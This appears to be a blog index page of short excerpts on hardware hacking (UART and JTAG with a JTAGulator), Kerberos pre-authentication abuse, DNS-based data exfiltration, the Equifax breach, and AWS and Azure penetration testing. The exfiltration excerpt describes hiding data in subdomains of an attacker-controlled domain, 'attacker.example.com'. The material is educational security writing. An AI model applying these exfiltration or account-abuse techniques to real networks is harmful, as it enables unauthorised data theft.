Discovering UART with the JTAGulator and connecting to it with UART PassThrough and a USB-to-UART! Introduction UART stands for Universal Asynchronous Receiver/Transmitter, however in the context of Hardware Hacking we’re generally looking for an serial interface which will give us text output from the system and possibly allow for command input. The general intention from the manufacturers point of view – is to allow easy debugging, both out of the factor (to check the system is working as intended) and if a device is returned as broken.
Discovering JTAG ports with the JTAGulator, and connecting to them with UM232H! What is JTAG? JTAG is short for Joint Test Action Group and generally refers to on-chip debugging interfaces that follow the IEEE 1149.x standard. The standard doesn’t mandate a certain connection – it just dictates a standard for communicating with chips in a device. It uses 5 pins: TCK, TMS, TDI, TDO and (options) TRST; which are (Test) Clock, Mode Select, Data In, Data Out, and Reset. It can be useful to hardware hackers in various ways, such as extracting device IDs, extracting firmware, overwriting memory.
Back in 2016, Geoffrey Janjua of Exumbra Operations Group, presented at LayerOne about “Kerberos Party Tricks” and abusing user accounts which have Kerberos Pre-authentication disabled. The python script he released at the time was a great proof-of-concept, but there are alternative tools available now for detecting, and exploiting, this issue.
Following a successful penetration test, you may have large amounts of data to exfiltrate from an environment specifically hardened to make it difficult to exfiltrate data. For example, the network might have a firewall that explicitly blocks common exfiltration methods – such as SSH, HTTPS, HTTP. It is common that you can still exfiltrate data from these networks by using DNS. For example you could make a request to a domain name that you control where the subdomain contains some information to be exfiltrated. Such as sensitive-data-here.attacker.example.com. DNS is a recursive system, such that if you send this request to …
Summary In 2017 Equifax were breached, the breach was discovered on July 29 and an announcement was published on Sept 7. It wasn’t the largest breach of all time, and not even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from 142.72 to 92.98 (34.58%)
The Problems of Security Testing and Unmanageable Reports I’d like to talk a little bit about security testing, the problem of information overload and issue prioritisation. To do this I intend on broadly discussing some of the problems of the various options for security testing that organisations have. I’ve written about some related things before, if you’d like a warm up: Vulnerability Assessments vs Penetration Tests. Security is Hard: Why are you laughing Security is Hard: Where do I start However, I’d like to look a little at security a little more strategically today and to discuss the wider problems …
Introduction I recently wrote an introduction to cloud computing, and an introduction to PenTesting an AWS Environment. A sensible place to start given that I included that in Q1 of 2018 Amazon holds a 33% market share in cloud whereas Microsoft only holds 13%. However I did want to add a few notes that are specific to PenTesting within Azure environments here.
Many Clouds in the Sky A couple of days ago, I posted an article about Penetration Testing within AWS. I made comment on the different kinds of testing within this kind of environment however I didn’t add much detail regarding the kinds of environments – as I was speaking specifically of AWS. So I decided to break things down a little further: Part 1. An Introduction to Cloud Computing (you are here) Part 2. An Introduction to Penetration Testing AWS: Same Same, but Different Part 3. An Introduction to PenTesting Azure I’m going to do a short piece here to …
Same Same, but Different Introduction When penetration testing Amazon Web Services (AWS) environments there are different perspectives the assessment could consider, some are very similar to external infrastructure/web application assessments and some are different. I’ll separate the things that are the same from the things that are different to traditional penetration testing by considering the following types of cloud testing and then breaking each one down into the kinds of testing that could take place: